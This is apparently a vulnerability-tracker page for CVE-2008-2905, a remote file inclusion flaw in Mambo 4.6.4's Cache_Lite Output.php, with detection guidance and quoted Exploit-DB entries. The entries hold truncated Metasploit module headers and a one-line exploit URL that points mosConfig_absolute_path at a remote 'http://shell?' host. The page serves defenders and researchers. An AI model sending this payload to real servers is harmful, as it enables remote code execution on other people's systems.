CVE-2008-2905
published 2008-06-30CVE-2008-2905: PHP remote file inclusion vulnerability in includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo 4.6.4 and earlier, when register_globals is…
PriorityP347medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
18.40%
96.9th percentile
PHP remote file inclusion vulnerability in includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo 4.6.4 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
Affected
23 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
| mambo | mambo | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP requests targeting the path /includes/Cache/Lite/Output.php with a URL-valued mosConfig_absolute_path parameter, which is the injection point for this RFI vulnerability. ↗
- →Alert on GET requests where the mosConfig_absolute_path query parameter contains an external URL (http:// or https://) — this is the canonical exploitation pattern for this RFI. ↗
- →The Metasploit module hex-encodes the remote payload URL using Rex::Text.to_hex with '%' prefix before injecting it into mosConfig_absolute_path; detection rules should account for percent-encoded URLs in this parameter. ↗
- →The vulnerable code path is the require_once call in Output.php that directly incorporates the unvalidated mosConfig_absolute_path value; file integrity monitoring on this file can help detect tampering. ↗
- ·The vulnerability is only exploitable when PHP's register_globals directive is enabled; systems with register_globals disabled are not affected. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Mambo - Cache_Lite Class MosConfig_absolute_path Remote File Inclusion (Metasploit)
exploitdb·2010-11-24
CVE-2008-2905 Mambo - Cache_Lite Class MosConfig_absolute_path Remote File Inclusion (Metasploit)
Mambo - Cache_Lite Class MosConfig_absolute_path Remote File Inclusion (Metasploit)
---
##
# $Id: mambo_cache_lite.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include',
'Description' => %q{
This module exploits a remote file inclusion vulnerability in
includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo
4.6.4 and earlier.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11127 $',
'References' =>
[
[ 'C
Exploit-DB
Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit)
exploitdb·2008-06-14
CVE-2008-2905 Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit)
Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 'Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include.',
'Description' => %q{
This module exploits a remote file inclusion vulnerability in
includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo
4.6.4 and earlier.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision:$',
'References' =>
[
[ 'CVE', '2008-2905' ],
[ 'BID', '29716' ],
],
'Privileged' => false,
'Payload' =>
{
'D
Exploit-DB
Mambo 4.6.4 - 'Output.php' Remote File Inclusion
exploitdb·2008-06-13
CVE-2008-2905 Mambo 4.6.4 - 'Output.php' Remote File Inclusion
Mambo 4.6.4 - 'Output.php' Remote File Inclusion
---
.-----------------------------------------------------------------------------.
| vuln.: Mambo
12 */
13
14 require_once($mosConfig_absolute_path . '/includes/Cache/Lite.php');
...
^ no comment.. RFI in line 14..
# exploit:
http://[host]/[path]/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://shell?
# milw0rm.com [2008-06-13]
Metasploit
Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include
metasploit
Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include
Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include
This module exploits a remote file inclusion vulnerability in includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo 4.6.4 and earlier.
No writeups or analysis indexed.
http://secunia.com/advisories/30685http://www.securityfocus.com/bid/29716http://www.securitytracker.com/id?1020295https://exchange.xforce.ibmcloud.com/vulnerabilities/43101https://www.exploit-db.com/exploits/5808http://secunia.com/advisories/30685http://www.securityfocus.com/bid/29716http://www.securitytracker.com/id?1020295https://exchange.xforce.ibmcloud.com/vulnerabilities/43101https://www.exploit-db.com/exploits/5808
2008-06-30
Published